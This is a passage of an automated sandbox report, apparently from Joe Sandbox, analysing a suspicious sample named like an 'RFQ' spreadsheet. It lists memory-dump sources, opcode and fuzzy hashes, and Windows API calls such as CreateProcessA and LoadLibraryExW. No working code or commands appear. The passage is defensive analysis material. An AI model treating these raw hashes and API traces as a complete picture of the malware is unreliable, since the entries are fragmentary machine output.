                                              • Instruction Fuzzy Hash: D301D232B016155BCB6A777D442413E6A9BAFC6210B54447F9B0ACB7A4EE30C90687E2
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.3265876746.00000000014F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014F0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_14f0000_RFQ-101432620247fl#U00e2#U00aexslx.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: c9f22ad35f185fe6c74a9b85e401472ac481546ca56a9f0617d52e5954cce090
                                              • Instruction ID: 8ec1c7a3f35d3155b2afcf73f6ad33d0d627cca1dc5abe680f6523d34f62bf66
                                              • Opcode Fuzzy Hash: c9f22ad35f185fe6c74a9b85e401472ac481546ca56a9f0617d52e5954cce090
                                              • Instruction Fuzzy Hash: 14218571E0020A9BDB19CF69D59479EFBB2FF89304F10852AE905EB3A1DB70D845CB90
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.3265876746.00000000014F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014F0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_14f0000_RFQ-101432620247fl#U00e2#U00aexslx.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 713ef59c9a180bb9f5976b437aac30577f94af038058b501ab8309e79b6e8df7
                                              • Instruction ID: 430a9561082f21fd022f5e67cb17921f19980e992c45530316e04a3c7375027c
                                              • Opcode Fuzzy Hash: 713ef59c9a180bb9f5976b437aac30577f94af038058b501ab8309e79b6e8df7
                                              • Instruction Fuzzy Hash: E921B034E002058BCB19CFA9D5506DEBBB6AF89314F11892EF901FB365DB70A842CB80
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.3265876746.00000000014F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014F0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_14f0000_RFQ-101432620247fl#U00e2#U00aexslx.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: bdca1170cc0298fabb824e202b6b4a6d181d1ab5061d8ec13c84b7b7b11c2228
                                              • Instruction ID: 97e6dc9fb96658c6b595179fe6a19539400303cd883f07ed0ce0e6efe0d2a7c9
                                              • Opcode Fuzzy Hash: bdca1170cc0298fabb824e202b6b4a6d181d1ab5061d8ec13c84b7b7b11c2228
                                              • Instruction Fuzzy Hash: B021B271A101098FEB11CF6DC954BAE7BF6BF88714F10806EE601EB3B1DAB58C008B50
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.3265876746.00000000014F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014F0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_14f0000_RFQ-101432620247fl#U00e2#U00aexslx.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: b291641a5905b87b0c5352959f32aff818f61358a4ee51a22a6ad025d3ff6f89
                                              • Instruction ID: 025690c4e59a975a16f4952c7ab4a1ad43a631a547ad0ac3d262b4e1765c1a0a
                                              • Opcode Fuzzy Hash: b291641a5905b87b0c5352959f32aff818f61358a4ee51a22a6ad025d3ff6f89
                                              • Instruction Fuzzy Hash: 65216D71A101098FEB149F6DC954BAE7AF6BF88714F20816EE605EB3B5DA719C008B90
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.3265876746.00000000014F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014F0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_14f0000_RFQ-101432620247fl#U00e2#U00aexslx.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 4ee7e8344b3ad81851f0f37015b67c01711051ea8e51b3eb1d77f09464bf575a
                                              • Instruction ID: b8ae716fa4719108fb4201829fbd12d4cfa8b96aeb8030c7f84eb1a0570f0906
                                              • Opcode Fuzzy Hash: 4ee7e8344b3ad81851f0f37015b67c01711051ea8e51b3eb1d77f09464bf575a
                                              • Instruction Fuzzy Hash: C4212730B00255CFEB25DB79C658BAE77F6EB49644F2004AED205EB360DB369D41CBA1
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.3265876746.00000000014F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014F0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_14f0000_RFQ-101432620247fl#U00e2#U00aexslx.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 0a8bbf0ccda158e8871a833559cb115d13c5ddaba422ba06708fdc5396362d38
                                              • Instruction ID: f3a68870113b987a4e3c01a9db8d854afaa9458ffb1db2fc05381ac464632ff9
                                              • Opcode Fuzzy Hash: 0a8bbf0ccda158e8871a833559cb115d13c5ddaba422ba06708fdc5396362d38
                                              • Instruction Fuzzy Hash: 3E21F474700205CFDB24DF78D558AAEBBF1EB48600B1000ADE506EB365DB3A9D40CBA1
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.3265193526.000000000141D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0141D000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_141d000_RFQ-101432620247fl#U00e2#U00aexslx.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 9e5e0117115dcfed45b979b21c46d9992b4b5953678ccd835c3275292d2f3b08
                                              • Instruction ID: 1b782b43e6c0795ca759e5d83c56950b857c980ddc209ebfc65806d3341a6b7d
                                              • Opcode Fuzzy Hash: 9e5e0117115dcfed45b979b21c46d9992b4b5953678ccd835c3275292d2f3b08
                                              • Instruction Fuzzy Hash: B82125F5904200DFCB15DF58D988B26BF65EB84318F24C56ED80A0B36AC33AD847CA62
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.3265876746.00000000014F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014F0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_14f0000_RFQ-101432620247fl#U00e2#U00aexslx.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 053aa7da6d2a630180042792f88bff0c8f2562900388b41d9ca54a84e4b5e08c
                                              • Instruction ID: f55efd7e9b7e5fea2b613713fe3daf72e8120973cd49995a8a3aa82dbf03c79e
                                              • Opcode Fuzzy Hash: 053aa7da6d2a630180042792f88bff0c8f2562900388b41d9ca54a84e4b5e08c
                                              • Instruction Fuzzy Hash: 7B21C234E002098BDB19CFA9C54069EBBB6BF89310F11892FF901FB361DB70A842CB50
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.3265876746.00000000014F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014F0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_14f0000_RFQ-101432620247fl#U00e2#U00aexslx.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: bd0026119be84d38249e7094c4835ec25a9a9ca04d692aac831857b9667f544b
                                              • Instruction ID: bc4a9f7cbd5a54778b0595791456f19c0353679b59a6d17e6cb487f92fc72c47
                                              • Opcode Fuzzy Hash: bd0026119be84d38249e7094c4835ec25a9a9ca04d692aac831857b9667f544b
                                              • Instruction Fuzzy Hash: FC216A34B00215CFDB25EB79C6147AE77F6AB49A44F20046ED206EB370DB369D41CBA1
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.3265876746.00000000014F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014F0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_14f0000_RFQ-101432620247fl#U00e2#U00aexslx.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 687b58492f778d11c3b67cc3ab2ae23b89097706cdc398e800cd88f26d3cb4aa
                                              • Instruction ID: fc4d510f716ad50bfca7c6764a8ba5a5e9d71aab3e1f8edcc4eab846b88bb41c
                                              • Opcode Fuzzy Hash: 687b58492f778d11c3b67cc3ab2ae23b89097706cdc398e800cd88f26d3cb4aa
                                              • Instruction Fuzzy Hash: B22163707001019BEF22DB6CF888B5A375BEB49B54F544926E50BCB37ADE389D448F81
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.3265193526.000000000141D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0141D000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_141d000_RFQ-101432620247fl#U00e2#U00aexslx.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: cd0b48a1a0a9893c218a5fe342889512dc5163b5f90830b8d89d88f1aad3b029
                                              • Instruction ID: 8b45a1f33874eb22fd8b6119f2737c258dcf996360159aaaec96af00711dfd17
                                              • Opcode Fuzzy Hash: cd0b48a1a0a9893c218a5fe342889512dc5163b5f90830b8d89d88f1aad3b029
                                              • Instruction Fuzzy Hash: 74216DB15093C09FDB07CF64D994711BF71EB46214F29C5DBD8898F2A7C23A981ACB62
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.3265876746.00000000014F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014F0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_14f0000_RFQ-101432620247fl#U00e2#U00aexslx.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 399230500dd0ef4526a20ef85a1ed4a6f2988f61252ab2dba62fbd9e1952aa8b
                                              • Instruction ID: d8b58cb72268a75fe0425de1986b6844c8461fd088045da17fe51e17e08e2c72
                                              • Opcode Fuzzy Hash: 399230500dd0ef4526a20ef85a1ed4a6f2988f61252ab2dba62fbd9e1952aa8b
                                              • Instruction Fuzzy Hash: 7321E574700205CFDB24DF79D558AAEBBF1EB88600B1040A9E606EB375DB3A9D40CBA1
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.3265876746.00000000014F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014F0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_14f0000_RFQ-101432620247fl#U00e2#U00aexslx.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 9e545f0c166065f57956ade7b99899aab848ae3681c83ce6440ca4607d74ce67
                                              • Instruction ID: 35acf419127192cb5846cac49124f1354fcf198b10968e527cea6e2880e955a0
                                              • Opcode Fuzzy Hash: 9e545f0c166065f57956ade7b99899aab848ae3681c83ce6440ca4607d74ce67
                                              • Instruction Fuzzy Hash: 7911B231F001458ADB109BB9941436FBBA5EB84320F50457ED51AD7396EB35884583A2
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.3265876746.00000000014F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014F0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_14f0000_RFQ-101432620247fl#U00e2#U00aexslx.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: d602a321812a161180241f64bb18efcf142ca43a658a18296321543b44e451e1
                                              • Instruction ID: 1708b15a633c18939916e50536bb6918124b734d45392a1613c905bade4874c2
                                              • Opcode Fuzzy Hash: d602a321812a161180241f64bb18efcf142ca43a658a18296321543b44e451e1
                                              • Instruction Fuzzy Hash: 50119D30B012009BEF268A7C944436A36A3EB86214F20496FF603CB363DA35CD818BC1
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.3265876746.00000000014F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014F0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_14f0000_RFQ-101432620247fl#U00e2#U00aexslx.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: acccd81e84d2d7af06e9021ecd83a5778d1b49883c0ba0a5774382f8ccc51bec
                                              • Instruction ID: 482f1ab7d91cc617a1131452d33c1dbabd8999db0f50c90b5d71fced40080317
                                              • Opcode Fuzzy Hash: acccd81e84d2d7af06e9021ecd83a5778d1b49883c0ba0a5774382f8ccc51bec
                                              • Instruction Fuzzy Hash: ED118F30B012049BEF269A7DD44472E36A7EB85654F60497EF607CB363DA75DC818BC1
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.3265876746.00000000014F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014F0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_14f0000_RFQ-101432620247fl#U00e2#U00aexslx.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: c59eb4c742e40c6432c29bf14aa381942912dd24431c6d5115ba9ace4ee48f4e
                                              • Instruction ID: cd0d2974623c7782e7470b1562c35f6ee2226e6dc22041fc91ccaceae618fb69
                                              • Opcode Fuzzy Hash: c59eb4c742e40c6432c29bf14aa381942912dd24431c6d5115ba9ace4ee48f4e
                                              • Instruction Fuzzy Hash: 84016D31A01215CFCB21EFB984501AE7BE6EB98610B1400BFEA05E7312E735D8428BA5
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.3265876746.00000000014F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014F0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_14f0000_RFQ-101432620247fl#U00e2#U00aexslx.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 84c1b3245eae6ed3877f6723b9e7d64114a31c5d11c7959513597ad005f93541
                                              • Instruction ID: 270475fe9bc6e8df878b52260f37b3bc764c045f7e644da3188e6a129d4e1fd8
                                              • Opcode Fuzzy Hash: 84c1b3245eae6ed3877f6723b9e7d64114a31c5d11c7959513597ad005f93541
                                              • Instruction Fuzzy Hash: D901F530A001058BCB00DF5ADC84B8BBBA5FF84311F54C57AD9081F3A6DB70A945CBA0
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.3265876746.00000000014F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014F0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_14f0000_RFQ-101432620247fl#U00e2#U00aexslx.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 874f469d3b866e513ca61e292d686a18042628049903e55ba12e73b9b28095c4
                                              • Instruction ID: 48abb5fa22a2cd89b7a9d16c7db72535f4f77f20d034df90b1a68f7f23e049f5
                                              • Opcode Fuzzy Hash: 874f469d3b866e513ca61e292d686a18042628049903e55ba12e73b9b28095c4
                                              • Instruction Fuzzy Hash: 91F0D122A096516B9766627D582057E7E9A8EC3120B4840AF9B55DB3A2DE308906C2F3
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.3265876746.00000000014F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014F0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_14f0000_RFQ-101432620247fl#U00e2#U00aexslx.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: ab7e070bdcfd6b88ba4712ea639acff1a2c6da9acf459d00f924eb3297f9a36a
                                              • Instruction ID: 14a4085ee5709345c3cc4f4d34bb2844970d0abd535560b3f794437bc70edac5
                                              • Opcode Fuzzy Hash: ab7e070bdcfd6b88ba4712ea639acff1a2c6da9acf459d00f924eb3297f9a36a
                                              • Instruction Fuzzy Hash: 5001A239B00119CFC714DB68E698A59B7B2EF89215B5540A8E50ADB378DF35AD02CB40
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.3265876746.00000000014F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014F0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_14f0000_RFQ-101432620247fl#U00e2#U00aexslx.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 87f2db9e5551571feb724aed2856b05f0c922acf7a75c35bcf17c09a71f35e74
                                              • Instruction ID: 5099871a631e9c1f77de683bab8f0d26ec5e78f38bf533c630489d23868d8229
                                              • Opcode Fuzzy Hash: 87f2db9e5551571feb724aed2856b05f0c922acf7a75c35bcf17c09a71f35e74
                                              • Instruction Fuzzy Hash: 92018F702142459FDB06DBACFA8058C7F72EF52244B5056EDD8419F1B7DE396E06C781
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.3265876746.00000000014F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014F0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_14f0000_RFQ-101432620247fl#U00e2#U00aexslx.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 1b64f595906abb35a2d8fac61267594ee0b3c8d58ca8a0dd26d38ce07466c924
                                              • Instruction ID: 2af891bf1a371e5c6efe3cbf07fa03b0a6eab490a2921eb1c9bedd17af02dfb3
                                              • Opcode Fuzzy Hash: 1b64f595906abb35a2d8fac61267594ee0b3c8d58ca8a0dd26d38ce07466c924
                                              • Instruction Fuzzy Hash: 7DF0F637A04150CBDB22CBA988901AD7FA1EEE961075800EFDB05DB372D335D543C751
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.3265876746.00000000014F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014F0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_14f0000_RFQ-101432620247fl#U00e2#U00aexslx.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 525582eff8181c0d4ad5582346516d03a4374d084feeebb19f575abc321878ee
                                              • Instruction ID: dce655cadc6eca010699766901771c3ff7733a5e3835ee7c277289f8ada93a7c
                                              • Opcode Fuzzy Hash: 525582eff8181c0d4ad5582346516d03a4374d084feeebb19f575abc321878ee
                                              • Instruction Fuzzy Hash: F2F0AF70B10209EFDB05EFACFA8058C7FB6EF54304F5096A8C8059B265EE346E458B80

                                              Execution Graph

                                              Execution Coverage: 12.4%
                                              Dynamic/Decrypted Code Coverage: 100%
                                              Signature Coverage: 0%
                                              Total number of Nodes: 144
                                              Total number of Limit Nodes: 9

                                              Control-flow Graph

                                              APIs
                                              • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0730FE7E
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2107685073.0000000007300000.00000040.00000800.00020000.00000000.sdmp, Offset: 07300000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_7300000_ywKDUBCUA.jbxd
                                              Similarity
                                              • API ID: CreateProcess
                                              • String ID:
                                              • API String ID: 963392458-0
                                              • Opcode ID: 760f1d2063bd9e8a35bc0f8334cc9ddcafbc441880cb19a824e30bce46340afe
                                              • Instruction ID: fa5c73e74646abcec190035e9ce0a34136a613d996b7f112694061b33f2948b1
                                              • Opcode Fuzzy Hash: 760f1d2063bd9e8a35bc0f8334cc9ddcafbc441880cb19a824e30bce46340afe
                                              • Instruction Fuzzy Hash: 08916CB1D0021ACFEB20DF68C851BEDBBB2FF49314F1485A9D808A7294DB749985CF91

                                              Control-flow Graph

                                              APIs
                                              • GetModuleHandleW.KERNELBASE(00000000), ref: 016DB33E
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2102365673.00000000016D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016D0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_16d0000_ywKDUBCUA.jbxd
                                              Similarity
                                              • API ID: HandleModule
                                              • String ID:
                                              • API String ID: 4139908857-0
                                              • Opcode ID: 1ac16d5b67002fd3049445fd69c8a5cf46da324a453357446e7a9341f81ea68f
                                              • Instruction ID: 56525f94822fc77c7b5a2eb2f246b2649d799e6dd195ca290da842e118976b00
                                              • Opcode Fuzzy Hash: 1ac16d5b67002fd3049445fd69c8a5cf46da324a453357446e7a9341f81ea68f
                                              • Instruction Fuzzy Hash: C07123B0A00B058FD724CF69D84576ABBF1FF89200F01892ED58ADBB54DB35E949CB91

                                              Control-flow Graph

                                              APIs
                                              • CreateActCtxA.KERNEL32(?), ref: 016D59A9
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2102365673.00000000016D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016D0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_16d0000_ywKDUBCUA.jbxd
                                              Similarity
                                              • API ID: Create
                                              • String ID:
                                              • API String ID: 2289755597-0
                                              • Opcode ID: c87b020ba96337c85a8b106d59facb55b2d4a9fd39f721790bec4dde15cb34e1
                                              • Instruction ID: 0cc5ca80a6277a7bde0b8a4300578f7441b81d659eca140c2c961915b95952ee
                                              • Opcode Fuzzy Hash: c87b020ba96337c85a8b106d59facb55b2d4a9fd39f721790bec4dde15cb34e1
                                              • Instruction Fuzzy Hash: A041E2B0C00719CFDB24CFA9C884B9EBBF5BF49304F24806AD409AB251DB756945CF90

                                              Control-flow Graph

                                              APIs
                                              • CreateActCtxA.KERNEL32(?), ref: 016D59A9
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2102365673.00000000016D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016D0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_16d0000_ywKDUBCUA.jbxd
                                              Similarity
                                              • API ID: Create
                                              • String ID:
                                              • API String ID: 2289755597-0
                                              • Opcode ID: d405bfcce3753f5cc2e41e1451ec83d9d7bb8248ef3926747c931770844a9efa
                                              • Instruction ID: 0f1f6297ee67e94fb44b0038a0e3323893cffbb4ae31a8b9d2050353168575b0
                                              • Opcode Fuzzy Hash: d405bfcce3753f5cc2e41e1451ec83d9d7bb8248ef3926747c931770844a9efa
                                              • Instruction Fuzzy Hash: 1341E2B1C00759CFDB24CFA9C884B9EBBF6BF89304F24805AD409AB261DB756949CF51

                                              Control-flow Graph

                                              APIs
                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,016DD58E,?,?,?,?,?), ref: 016DD64F
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2102365673.00000000016D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016D0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_16d0000_ywKDUBCUA.jbxd
                                              Similarity
                                              • API ID: DuplicateHandle
                                              • String ID:
                                              • API String ID: 3793708945-0
                                              • Opcode ID: e00f21905d761ac776b98518ca5264fc7584639e4722ddd633791ef10a5afd0d
                                              • Instruction ID: de73cfb082acaf46d5b787e13aba08221845843bbda7cdf6b4a501b928350606
                                              • Opcode Fuzzy Hash: e00f21905d761ac776b98518ca5264fc7584639e4722ddd633791ef10a5afd0d
                                              • Instruction Fuzzy Hash: FB21E6B5D002589FDB10DF99D984AEEBFF4FB48310F14845AE918A3350D374A950CFA4

                                              Control-flow Graph

                                              APIs
                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,016DD58E,?,?,?,?,?), ref: 016DD64F
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2102365673.00000000016D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016D0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_16d0000_ywKDUBCUA.jbxd
                                              Similarity
                                              • API ID: DuplicateHandle
                                              • String ID:
                                              • API String ID: 3793708945-0
                                              • Opcode ID: 45526ce4927f0f446c3432424762af62d59d8911afd95f3fe28cf16568614c2f
                                              • Instruction ID: 8aa898fe27218617c231516e0a77b48a51c894f38a2f79cb969e4492f3dbf063
                                              • Opcode Fuzzy Hash: 45526ce4927f0f446c3432424762af62d59d8911afd95f3fe28cf16568614c2f
                                              • Instruction Fuzzy Hash: C921E4B5D002589FDB10CFAAD984AEEBFF8FB48310F14841AE958A3350D374A940CFA4

                                              Control-flow Graph (rendered as an image in the original report; legend: executed / not executed)
                                              Basic blocks: 16dad9c-16db5a0 -> 16db5a8-16db5d7 (LoadLibraryExW) and 16db5a2-16db5a5; 16db5a2-16db5a5 -> 16db5a8-16db5d7; 16db5a8-16db5d7 -> 16db5d9-16db5df and 16db5e0-16db5fd; 16db5d9-16db5df -> 16db5e0-16db5fd
                                              APIs
                                              • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,016DB3B9,00000800,00000000,00000000), ref: 016DB5CA
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2102365673.00000000016D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016D0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_16d0000_ywKDUBCUA.jbxd
                                              Similarity
                                              • API ID: LibraryLoad
                                              • String ID:
                                              • API String ID: 1029625771-0
                                              • Opcode ID: 18ae05c7c003e840a7457656e1748c04258eafdf6a45853bac51214d5ed6a0a0
                                              • Instruction ID: 208b4c1cc37cbf4496123a06682bb9a0efa3610bc5ab8881cce5d300eee7e704
                                              • Opcode Fuzzy Hash: 18ae05c7c003e840a7457656e1748c04258eafdf6a45853bac51214d5ed6a0a0
                                              • Instruction Fuzzy Hash: 421114B6D002098FDB10CF9AC844A9EFBF4EB89310F54846ED919A7310C375A945CFA4
                                              APIs
                                              • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,016DB3B9,00000800,00000000,00000000), ref: 016DB5CA
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2102365673.00000000016D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016D0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_16d0000_ywKDUBCUA.jbxd
                                              Similarity
                                              • API ID: LibraryLoad
                                              • String ID:
                                              • API String ID: 1029625771-0
                                              • Opcode ID: 52dbfa42a09dde03c1c5f78cf90c0ca18905d98a20bf2638120c845b14e4591f
                                              • Instruction ID: 6f9698cc6a4f0ce2ad30e171f8cae45aa4b63de199baa890d6584128de0a3c62
                                              • Opcode Fuzzy Hash: 52dbfa42a09dde03c1c5f78cf90c0ca18905d98a20bf2638120c845b14e4591f
                                              • Instruction Fuzzy Hash: BC1100B6C002099FDB10CF9AC884ADEFBF8EF89310F14842AE959A7200C375A545CFA4
                                              APIs
                                              • GetModuleHandleW.KERNELBASE(00000000), ref: 016DB33E
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2102365673.00000000016D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016D0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_16d0000_ywKDUBCUA.jbxd
                                              Similarity
                                              • API ID: HandleModule
                                              • String ID:
                                              • API String ID: 4139908857-0
                                              • Opcode ID: af539106329dd621c145d9770ce14b4e8825add380d03b52a6137aa5a4bcef96
                                              • Instruction ID: 2700647894b077f8b7087cb5492c8af7f7e069490a469fad3aa5e8ab10d86763
                                              • Opcode Fuzzy Hash: af539106329dd621c145d9770ce14b4e8825add380d03b52a6137aa5a4bcef96
                                              • Instruction Fuzzy Hash: 081110B6C002498FDB20CF9AC844ADEFBF4EB88324F15841AD919A7310C375A545CFA1
                                              APIs
                                              • PostMessageW.USER32(?,00000010,00000000,?), ref: 050D381D
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2105124806.00000000050D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050D0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_50d0000_ywKDUBCUA.jbxd
                                              Similarity
                                              • API ID: MessagePost
                                              • String ID:
                                              • API String ID: 410705778-0
                                              • Opcode ID: 25df436fbc8a1cf1397e742d0c142889edd79ddd39ce65e154da9271f65c375b
                                              • Instruction ID: 03e22be09446b446e5c93c76ce99ec284b419c956f7ec00472cc88c2eecdef2f
                                              • Opcode Fuzzy Hash: 25df436fbc8a1cf1397e742d0c142889edd79ddd39ce65e154da9271f65c375b
                                              • Instruction Fuzzy Hash: 9611E3B58003499FDB20DF99D984BDEFBF8EB48310F108859E555A7210C375A944CFA1
                                              APIs
                                              • PostMessageW.USER32(?,00000010,00000000,?), ref: 050D381D
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2105124806.00000000050D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050D0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_50d0000_ywKDUBCUA.jbxd
                                              Similarity
                                              • API ID: MessagePost
                                              • String ID:
                                              • API String ID: 410705778-0
                                              • Opcode ID: b7ac8bdd7bdd92bfe53d7658f9dc0abe88621b9e16a061629582cbca4b1a33dd
                                              • Instruction ID: 2c7a751a871b42abaf56b922754aab5daba40d6a01ac89adbce3afb776942388
                                              • Opcode Fuzzy Hash: b7ac8bdd7bdd92bfe53d7658f9dc0abe88621b9e16a061629582cbca4b1a33dd
